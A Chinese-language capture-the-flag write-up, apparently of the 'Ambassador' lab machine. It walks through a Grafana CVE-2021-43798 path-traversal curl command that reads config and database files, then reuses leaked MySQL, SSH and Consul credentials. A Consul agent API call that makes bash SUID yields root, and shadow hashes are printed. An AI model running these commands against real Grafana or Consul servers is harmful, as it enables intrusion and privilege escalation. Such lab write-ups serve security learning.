基本信息

端口扫描

22,80,3000,3306:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
$ nmap -sC -sV -Pn 10.10.11.183
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-09 09:54 CST
Nmap scan report for 10.10.11.183
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
|_ 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sun, 09 Oct 2022 01:56:08 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sun, 09 Oct 2022 01:56:14 GMT
|_ Content-Length: 0
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 10
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, InteractiveClient, ODBCClient, LongPassword, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, SwitchToSSLAfterHandshake, LongColumnFlag, Speaks41ProtocolNew, IgnoreSigpipes, Support41Auth, SupportsTransactions, IgnoreSpaceBeforeParenthesis, FoundRows, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: J:BgUq\x0C.((lQ\x13N*,#p 7
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=7%D=10/9%Time=63422A37%P=x86_64-apple-darwin21.5.
SF:0%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-
SF:Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\
SF:nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Co
SF:okie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-
SF:Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-P
SF:rotection:\x201;\x20mode=block\r\nDate:\x20Sun,\x2009\x20Oct\x202022\x2
SF:001:56:08\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">
SF:Found</a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\
SF:r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x2
SF:0HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-F
SF:rame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:
SF:\x20Sun,\x2009\x20Oct\x202022\x2001:56:14\x20GMT\r\nContent-Length:\x20
SF:0\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\
SF:x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnecti
SF:on:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(T
SF:LSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x2
SF:0text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad
SF:\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.84 seconds

80

一个博客,直接说了devops获取密码:

3000

Grafana v8.2.0:

Grafana-CVE-2021-43798

很容易搜到这个相关漏洞:

/etc/grafana/grafana.ini

直接读取grafana配置文件,得到grafana admin密码,并且可以看到secret被注释掉了:

1
2
3
4
admin_password = messageInABottle685427

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

/var/lib/grafana/grafana.db

grafana.db也可以下载下来,这个没启用加密,直接查看即可:

1
2
3
4
5
6
7
curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

sqlite3 grafana.db
sqlite> .tables

sqlite> select * from data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-09 01:49:40|0|{}|1|uKewFgM4z

mysql

使用得到的账号密码连接mysql查看信息,获取到developer用户密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
mycli -h 10.10.11.183 -u grafana -pdontStandSoCloseToMe63221!

show databases;
use whackywidget;
show tables;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+

$ echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==" | base64 -d
anEnglishManInNewYork027468

user flag

developer用户ssh登录,得到user flag:

提权信息

/opt/my-app目录下,查看git历史,可以得到一个consul token:

1
2
3
4
developer@ambassador:/opt/my-app$ git show
...
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
...

另外可以搜索到consul相关漏洞:

提权 & root flag

根据msf模块代码构造curl命令调用api,执行任意命令。例如执行一个给bash加suid的sh文件:

(也可以把8500端口转发出来,然后直接用msf打)

1
2
3
4
5
echo 'chmod +s /usr/bin/bash' > /tmp/e.sh

curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" --request PUT -d '{"ID": "miao", "Name": "miao", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register

/usr/bin/bash -p

shadow

1
2
root:$6$AY/Hqk/PJgettbhs$mgg2hluJ8.leTpnrlEkh4RF7qE6Ns9j/TtV3Sx5OIsZ2YEA0OjGsJpmQlX2CFMmbwNjmvCZy9/Rcea4nF799V0:19065:0:99999:7:::
developer:$6$Qn1mw/0Al3UAi/qx$sBdXWTZE22UeJPw1iTYMb69LNMGbk9eZYj7o1H55rE9QB.t47TB6pOoOTf4ZfVSngS3aSK.CpANtRUM1hcAiG/:19237:0:99999:7:::

参考资料